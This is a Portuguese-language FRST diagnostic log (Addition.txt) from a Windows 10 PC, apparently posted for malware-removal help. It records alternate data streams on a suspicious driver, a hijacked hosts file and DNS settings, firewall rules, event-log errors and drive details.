2016-01-28 00:01 - 2016-03-04 12:11 - 00321848 _____ () C:\Program Files (x86)\baidu\Baidu Browser\bdaccount.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 00581432 _____ () C:\Program Files (x86)\baidu\Baidu Browser\bdstatreport.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 00116024 _____ () C:\Program Files (x86)\baidu\Baidu Browser\SparkSafe.dll
2015-11-16 16:58 - 2016-01-28 00:01 - 00085816 _____ () C:\Users\David\AppData\Roaming\baidu\Spark\sysdata\ExtApp\SnapImg\SnapImg.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 01281848 _____ () C:\Program Files (x86)\baidu\Baidu Browser\libglesv2.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 00080696 _____ () C:\Program Files (x86)\baidu\Baidu Browser\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(Se uma entrada for incluída na fixlist, somente o ADS será removido.)

AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [346]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{3cc04671-befa-11e5-82f2-c89cdc4e54f7} [20]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{3cc04672-befa-11e5-82f2-c89cdc4e54f7} [27]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{3cc04673-befa-11e5-82f2-c89cdc4e54f7} [30]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{3cc04674-befa-11e5-82f2-c89cdc4e54f7} [31]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{3cc04675-befa-11e5-82f2-c89cdc4e54f7} [38]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{3cc04676-befa-11e5-82f2-c89cdc4e54f7} [41]
AlternateDataStreams: C:\Users\David\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\David\AppData\Roaming:NT2 [346]

==================== Modo de Segurança (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BavSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BavSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\zdengine => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\zdwfp => ""="Driver"

==================== EXE Associação (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)


==================== Internet Explorer confiável/restrito ===============

(Se uma entrada for incluída na fixlist, será removida do Registro.)


==================== Hosts Conteúdo: ==========================

(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)

2013-08-22 10:25 - 2016-04-02 01:47 - 00002016 ____A C:\WINDOWS\system32\Drivers\etc\hosts

107.178.255.88 www.google-analytics.com
107.178.255.88 www.statcounter.com
107.178.255.88 statcounter.com
107.178.255.88 ssl.google-analytics.com
107.178.255.88 partner.googleadservices.com
107.178.255.88 google-analytics.com
107.178.248.130 static.doubleclick.net
107.178.247.130 connect.facebook.net
107.178.255.88 www.google-analytics.com
107.178.255.88 www.statcounter.com
107.178.255.88 statcounter.com
107.178.255.88 ssl.google-analytics.com
107.178.255.88 partner.googleadservices.com
107.178.255.88 google-analytics.com
107.178.248.130 static.doubleclick.net
107.178.247.130 connect.facebook.net127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com

==================== Outras Áreas ============================

(Atualmente não há nenhuma correção automática para esta seção.)

HKU\S-1-5-21-3348681765-1422920454-2627347377-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\David\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
HKU\S-1-5-21-3348681765-1422920454-2627347377-1004\Control Panel\Desktop\\Wallpaper -> C:\Users\migue_000\AppData\Local\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 82.163.143.185 - 82.163.142.185
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.

==================== MSCONFIG/TASK MANAGER ítens desabilitados ==

(Atualmente não há nenhuma correção automática para esta seção.)

MSCONFIG\Services: BavSvc => 2
MSCONFIG\Services: BdSandboxSrv => 3
MSCONFIG\Services: BHipsSvc => 2
MSCONFIG\Services: Disc Soft Lite Bus Service => 3
MSCONFIG\Services: GfExperienceService => 2
MSCONFIG\Services: gupdate => 3
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: NvNetworkService => 2
MSCONFIG\Services: NvStreamSvc => 2
MSCONFIG\Services: nvsvc => 3
MSCONFIG\Services: PCFasterSvc_{PCFaster_5.1.0.0} => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: Stereo Service => 2
MSCONFIG\Services: SwitchBoard => 3
MSCONFIG\Services: SystemUsageReportSvc_WILLAMETTE => 2
MSCONFIG\Services: USER_ESRV_SVC_WILLAMETTE => 3
MSCONFIG\Services: VIAKaraokeService => 2

==================== Regras do Firewall (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{D27C03D3-289C-47D6-8411-6EDE81486000}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{59A97412-16A3-4719-A5B2-70F583CEDB82}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [UDP Query User{F1B191FB-7608-4D4A-88E8-E0934F970B2E}F:\downloads\3dmgame-pro.evolution.soccer.2016.cracked-3dm\3dmgame-pro.evolution.soccer.2016.cracked-3dm\pro evolution soccer 2016\pes2016.exe] => (Allow) F:\downloads\3dmgame-pro.evolution.soccer.2016.cracked-3dm\3dmgame-pro.evolution.soccer.2016.cracked-3dm\pro evolution soccer 2016\pes2016.exe
FirewallRules: [TCP Query User{2481B005-305C-4BCC-9160-FD52E78E1924}F:\downloads\3dmgame-pro.evolution.soccer.2016.cracked-3dm\3dmgame-pro.evolution.soccer.2016.cracked-3dm\pro evolution soccer 2016\pes2016.exe] => (Allow) F:\downloads\3dmgame-pro.evolution.soccer.2016.cracked-3dm\3dmgame-pro.evolution.soccer.2016.cracked-3dm\pro evolution soccer 2016\pes2016.exe
FirewallRules: [{A44D4BF0-41AC-4A1A-84E2-522E83D9A7FB}] => (Allow) C:\Users\David\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{EB2F29CE-24FF-4DCA-B168-585C7158B21A}] => (Allow) C:\Users\David\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{507ADB31-AA33-4014-9B5D-BC59DAFD4D5C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{C639607B-7D1A-4B04-BF5A-A7ACF3447338}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [UDP Query User{60689C5C-1C89-4252-B2F5-61880343736B}F:\downloads\3dmgame-pro.evolution.soccer.2016.cracked-3dm\3dmgame-pro.evolution.soccer.2016.cracked-3dm\pro evolution soccer 2016\pes2016.exe] => (Allow) F:\downloads\3dmgame-pro.evolution.soccer.2016.cracked-3dm\3dmgame-pro.evolution.soccer.2016.cracked-3dm\pro evolution soccer 2016\pes2016.exe
FirewallRules: [TCP Query User{9B2068DE-C987-4AB6-A558-372B98CFEF8F}F:\downloads\3dmgame-pro.evolution.soccer.2016.cracked-3dm\3dmgame-pro.evolution.soccer.2016.cracked-3dm\pro evolution soccer 2016\pes2016.exe] => (Allow) F:\downloads\3dmgame-pro.evolution.soccer.2016.cracked-3dm\3dmgame-pro.evolution.soccer.2016.cracked-3dm\pro evolution soccer 2016\pes2016.exe
FirewallRules: [{646A1259-4113-487D-B232-55A476C5EA33}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{0100D2D3-DC6E-434D-A9C3-3D6497D6F4DE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{3DFF0F8F-2C09-40D1-B667-93D73B6ABB1A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{7E7D8750-F48E-4067-BD95-4A13B8EFE821}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{EF59FD79-19D5-4DEF-A7A3-5EA74834DDCD}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{6417A087-F477-4068-8916-6E5FC90651F7}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [TCP Query User{05E3C563-0B2B-499C-AD93-AAD0FC70B781}C:\program files (x86)\formatfactory\ffmodules\package\pfinstonline.exe] => (Allow) C:\program files (x86)\formatfactory\ffmodules\package\pfinstonline.exe
FirewallRules: [UDP Query User{586F8E83-CFFD-4292-87B2-AE4FC1AA776D}C:\program files (x86)\formatfactory\ffmodules\package\pfinstonline.exe] => (Allow) C:\program files (x86)\formatfactory\ffmodules\package\pfinstonline.exe
FirewallRules: [{3E74A8FA-F417-40DE-A0DB-A2977122232B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Walking Dead\WalkingDead101.exe
FirewallRules: [{CBF86D45-937F-4D04-97C6-7325314EAB44}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Walking Dead\WalkingDead101.exe
FirewallRules: [{E2AA88E3-9930-40FF-9D62-2B327D0B3A58}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Walking Dead Season Two\TheWalkingDead2.exe
FirewallRules: [{B48DCD78-A07E-44BA-8266-6D1EA014B0BA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Walking Dead Season Two\TheWalkingDead2.exe
FirewallRules: [{14B1CC1C-A435-4338-9D96-4C61721FB53B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sprite Lamp Demo\SpriteLamp.exe
FirewallRules: [{616D928D-3323-4A5D-902E-A251A5B18CEE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sprite Lamp Demo\SpriteLamp.exe
FirewallRules: [TCP Query User{50798E6D-CCE0-4E39-8BD7-F1B198EE90F1}C:\program files (x86)\ps3 media server\jre64\bin\javaw.exe] => (Allow) C:\program files (x86)\ps3 media server\jre64\bin\javaw.exe
FirewallRules: [UDP Query User{5710BC3A-5F24-45C6-8DA0-32737ECD3C22}C:\program files (x86)\ps3 media server\jre64\bin\javaw.exe] => (Allow) C:\program files (x86)\ps3 media server\jre64\bin\javaw.exe
FirewallRules: [TCP Query User{36E02D62-D980-4A6B-B413-554BFE4B31E8}C:\program files (x86)\max remote server\archives\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\max remote server\archives\jre\bin\javaw.exe
FirewallRules: [UDP Query User{C7EBC94A-C81E-452E-9860-FD115C086AE7}C:\program files (x86)\max remote server\archives\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\max remote server\archives\jre\bin\javaw.exe
FirewallRules: [{0A55B275-0BDD-4780-A963-B9E33289A074}] => (Allow) C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe
FirewallRules: [{7BB87EB7-E48B-4977-8EEB-490414BBB628}] => (Allow) C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe
FirewallRules: [{12DA9826-6EC4-45F2-A612-0061A3073097}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{66195D5B-ADEA-4CC9-9A30-6167CA9A32C8}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [TCP Query User{94A77FE3-43FC-48F7-AA5C-5E1FAE33482F}C:\program files (x86)\rockstar games\grand theft auto iv\gtaiv.exe] => (Allow) C:\program files (x86)\rockstar games\grand theft auto iv\gtaiv.exe
FirewallRules: [UDP Query User{9385CF58-1734-4325-9D31-6A11EDF289B1}C:\program files (x86)\rockstar games\grand theft auto iv\gtaiv.exe] => (Allow) C:\program files (x86)\rockstar games\grand theft auto iv\gtaiv.exe
FirewallRules: [{2D23381E-C4D5-4CA1-8D86-7590B7FE26DA}] => (Allow) C:\Program Files (x86)\baidu\Baidu Browser\Spark.exe
FirewallRules: [{14953AE4-2329-4371-939C-984742925E60}] => (Allow) C:\Program Files (x86)\baidu\Baidu Browser\Spark.exe
FirewallRules: [{473C50F7-AFA9-483F-AC6F-72474C0420F0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\NARUTO SHIPPUDEN Ultimate Ninja STORM 4\NSUNS4.exe
FirewallRules: [{BA523636-B7BE-4951-88AE-E042C76B3AC3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\NARUTO SHIPPUDEN Ultimate Ninja STORM 4\NSUNS4.exe
FirewallRules: [TCP Query User{E899B347-2223-4136-97B9-DD119091CEE6}J:\games\firewatch\firewatch.exe] => (Allow) J:\games\firewatch\firewatch.exe
FirewallRules: [UDP Query User{A872111C-20F1-4B37-9665-1948724A9E95}J:\games\firewatch\firewatch.exe] => (Allow) J:\games\firewatch\firewatch.exe
FirewallRules: [{A98F420D-7B1D-4BED-B608-0F9522E36DA7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cities_Skylines\Cities.exe
FirewallRules: [{135C1A59-7936-4A1D-844E-DA3CA51CB99B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cities_Skylines\Cities.exe
FirewallRules: [{BE570899-144F-4BE0-B1AD-99FD888F9B20}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\L.A.Noire\LANLauncher.exe
FirewallRules: [{F4B32CB7-3EC7-4B8E-9AE1-56A462297EB2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\L.A.Noire\LANLauncher.exe
FirewallRules: [{F1D6EABC-8A3F-40B6-AEE7-03EC04336917}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe
FirewallRules: [{BCFCB3E3-5A56-4E61-948A-CE43B285EA7F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe
FirewallRules: [{B083BF0A-761E-4A32-B3FF-3E7EB7E9139A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{EBAFA411-DB5D-4C52-8F74-45188D45EEB4}C:\program files (x86)\valve\half-life\hl.exe] => (Allow) C:\program files (x86)\valve\half-life\hl.exe
FirewallRules: [UDP Query User{98579AD4-3B40-440A-9A4B-4ECE57AADE73}C:\program files (x86)\valve\half-life\hl.exe] => (Allow) C:\program files (x86)\valve\half-life\hl.exe
FirewallRules: [TCP Query User{B8CF5598-02D7-42FA-9560-BD7A7E06D31E}C:\program files (x86)\counter-strike 1.6\hl.exe] => (Block) C:\program files (x86)\counter-strike 1.6\hl.exe
FirewallRules: [UDP Query User{F739A1D3-920F-4785-8D68-F7FF924FB542}C:\program files (x86)\counter-strike 1.6\hl.exe] => (Block) C:\program files (x86)\counter-strike 1.6\hl.exe

==================== Pontos de Restauração =========================

26-03-2016 01:10:45 Installed PokerStrategy.com Equilab.
02-04-2016 13:08:24 Instalador de Módulos do Windows

==================== Dispositivos Apresentando Falhas No Gerenciador =============


==================== Erros no Log de eventos: =========================

Erros em Aplicativos:
==================
Error: (04/03/2016 03:00:12 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DAVID_PASSOS)
Description: Falha na ativação do aplicativo Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (04/03/2016 03:00:07 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: HubTaskHost.exe, versão: 16.0.6605.2375, carimbo de data/hora: 0x568c7c20
Nome do módulo com falha: KERNELBASE.dll, versão: 10.0.10586.162, carimbo de data/hora: 0x56cd45b4
Código de exceção: 0x00000004
Deslocamento da falha: 0x0000000000071f28
ID do processo com falha: 0x3a7c
Hora de início do aplicativo com falha: 0xHubTaskHost.exe0
Caminho do aplicativo com falha: HubTaskHost.exe1
Caminho do módulo com falha: HubTaskHost.exe2
ID do Relatório: HubTaskHost.exe3
Nome completo do pacote com falha: HubTaskHost.exe4
ID do aplicativo relativo ao pacote com falha: HubTaskHost.exe5

Error: (04/03/2016 02:45:04 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DAVID_PASSOS)
Description: Falha na ativação do aplicativo Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (04/03/2016 02:44:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: HubTaskHost.exe, versão: 16.0.6605.2375, carimbo de data/hora: 0x568c7c20
Nome do módulo com falha: KERNELBASE.dll, versão: 10.0.10586.162, carimbo de data/hora: 0x56cd45b4
Código de exceção: 0x00000004
Deslocamento da falha: 0x0000000000071f28
ID do processo com falha: 0x1318
Hora de início do aplicativo com falha: 0xHubTaskHost.exe0
Caminho do aplicativo com falha: HubTaskHost.exe1
Caminho do módulo com falha: HubTaskHost.exe2
ID do Relatório: HubTaskHost.exe3
Nome completo do pacote com falha: HubTaskHost.exe4
ID do aplicativo relativo ao pacote com falha: HubTaskHost.exe5

Error: (04/03/2016 02:30:01 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DAVID_PASSOS)
Description: Falha na ativação do aplicativo Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (04/03/2016 02:29:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: backgroundTaskHost.exe, versão: 10.0.10586.0, carimbo de data/hora: 0x5632d8f0
Nome do módulo com falha: twinapi.appcore.dll, versão: 10.0.10586.0, carimbo de data/hora: 0x5632d2f5
Código de exceção: 0xc000027b
Deslocamento da falha: 0x000000000004b199
ID do processo com falha: 0x205c
Hora de início do aplicativo com falha: 0xbackgroundTaskHost.exe0
Caminho do aplicativo com falha: backgroundTaskHost.exe1
Caminho do módulo com falha: backgroundTaskHost.exe2
ID do Relatório: backgroundTaskHost.exe3
Nome completo do pacote com falha: backgroundTaskHost.exe4
ID do aplicativo relativo ao pacote com falha: backgroundTaskHost.exe5

Error: (04/03/2016 02:29:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: HubTaskHost.exe, versão: 16.0.6605.2375, carimbo de data/hora: 0x568c7c20
Nome do módulo com falha: KERNELBASE.dll, versão: 10.0.10586.162, carimbo de data/hora: 0x56cd45b4
Código de exceção: 0x00000004
Deslocamento da falha: 0x0000000000071f28
ID do processo com falha: 0x17dc
Hora de início do aplicativo com falha: 0xHubTaskHost.exe0
Caminho do aplicativo com falha: HubTaskHost.exe1
Caminho do módulo com falha: HubTaskHost.exe2
ID do Relatório: HubTaskHost.exe3
Nome completo do pacote com falha: HubTaskHost.exe4
ID do aplicativo relativo ao pacote com falha: HubTaskHost.exe5

Error: (04/03/2016 02:15:03 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DAVID_PASSOS)
Description: Falha na ativação do aplicativo Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.

Error: (04/03/2016 02:15:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: HubTaskHost.exe, versão: 16.0.6605.2375, carimbo de data/hora: 0x568c7c20
Nome do módulo com falha: KERNELBASE.dll, versão: 10.0.10586.162, carimbo de data/hora: 0x56cd45b4
Código de exceção: 0x00000004
Deslocamento da falha: 0x0000000000071f28
ID do processo com falha: 0x3040
Hora de início do aplicativo com falha: 0xHubTaskHost.exe0
Caminho do aplicativo com falha: HubTaskHost.exe1
Caminho do módulo com falha: HubTaskHost.exe2
ID do Relatório: HubTaskHost.exe3
Nome completo do pacote com falha: HubTaskHost.exe4
ID do aplicativo relativo ao pacote com falha: HubTaskHost.exe5

Error: (04/03/2016 02:04:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: backgroundTaskHost.exe, versão: 10.0.10586.0, carimbo de data/hora: 0x5632d8f0
Nome do módulo com falha: twinapi.appcore.dll, versão: 10.0.10586.0, carimbo de data/hora: 0x5632d2f5
Código de exceção: 0xc000027b
Deslocamento da falha: 0x000000000004b199
ID do processo com falha: 0xfc8
Hora de início do aplicativo com falha: 0xbackgroundTaskHost.exe0
Caminho do aplicativo com falha: backgroundTaskHost.exe1
Caminho do módulo com falha: backgroundTaskHost.exe2
ID do Relatório: backgroundTaskHost.exe3
Nome completo do pacote com falha: backgroundTaskHost.exe4
ID do aplicativo relativo ao pacote com falha: backgroundTaskHost.exe5


Erros de Sistema:
=============
Error: (04/03/2016 03:05:59 PM) (Source: DCOM) (EventID: 10005) (User: DAVID_PASSOS)
Description: 2zdengine-Service{C68E9BB6-3DBD-4C4B-910B-C5D84A7EBB03}

Error: (04/03/2016 03:05:59 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço zdengine devido ao seguinte erro: 
%%2

Error: (04/03/2016 03:05:59 PM) (Source: DCOM) (EventID: 10005) (User: DAVID_PASSOS)
Description: 2zdengine-Service{C68E9BB6-3DBD-4C4B-910B-C5D84A7EBB03}

Error: (04/03/2016 03:05:59 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço zdengine devido ao seguinte erro: 
%%2

Error: (04/03/2016 03:05:58 PM) (Source: DCOM) (EventID: 10005) (User: DAVID_PASSOS)
Description: 2zdengine-Service{C68E9BB6-3DBD-4C4B-910B-C5D84A7EBB03}

Error: (04/03/2016 03:05:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço zdengine devido ao seguinte erro: 
%%2

Error: (04/03/2016 03:05:54 PM) (Source: DCOM) (EventID: 10005) (User: DAVID_PASSOS)
Description: 2zdengine-Service{C68E9BB6-3DBD-4C4B-910B-C5D84A7EBB03}

Error: (04/03/2016 03:05:54 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço zdengine devido ao seguinte erro: 
%%2

Error: (04/03/2016 03:05:52 PM) (Source: DCOM) (EventID: 10005) (User: DAVID_PASSOS)
Description: 2zdengine-Service{C68E9BB6-3DBD-4C4B-910B-C5D84A7EBB03}

Error: (04/03/2016 03:05:52 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço zdengine devido ao seguinte erro: 
%%2


CodeIntegrity:
===================================
  Date: 2016-04-02 15:18:44.601
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-03-23 20:34:53.017
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-03-15 13:04:06.957
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-03-14 16:53:36.391
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-03-12 16:55:44.128
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-03-06 19:38:42.693
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-03-04 20:00:50.712
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-12 04:28:03.140
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-11 01:49:19.447
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-09 00:20:31.534
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.


==================== Informações da Memória =========================== 

Processador: Intel(R) Core(TM) i3-2120 CPU @ 3.30GHz
Percentagem de memória em uso: 37%
RAM física total: 8168.9 MB
RAM física disponível: 5080.24 MB
Virtual Total: 9448.9 MB
Virtual disponível: 5965.22 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:232.44 GB) (Free:34.18 GB) NTFS ==>[drive com componentes de inicialização (obtido através de BCD)]
Drive j: () (Fixed) (Total:232.94 GB) (Free:145.37 GB) NTFS
Drive k: (Disco Local ) (Fixed) (Total:232.82 GB) (Free:150.88 GB) NTFS

==================== MBR & Tabela de Partições ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 625E625E)
Partition 1: (Active) - (Size=232.4 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (Size: 465.8 GB) (Disk ID: E820E04E)
Partition 1: (Not Active) - (Size=232.9 GB) - (Type=OF Extended)
Partition 2: (Active) - (Size=232.8 GB) - (Type=07 NTFS)

==================== Fim de Addition.txt ============================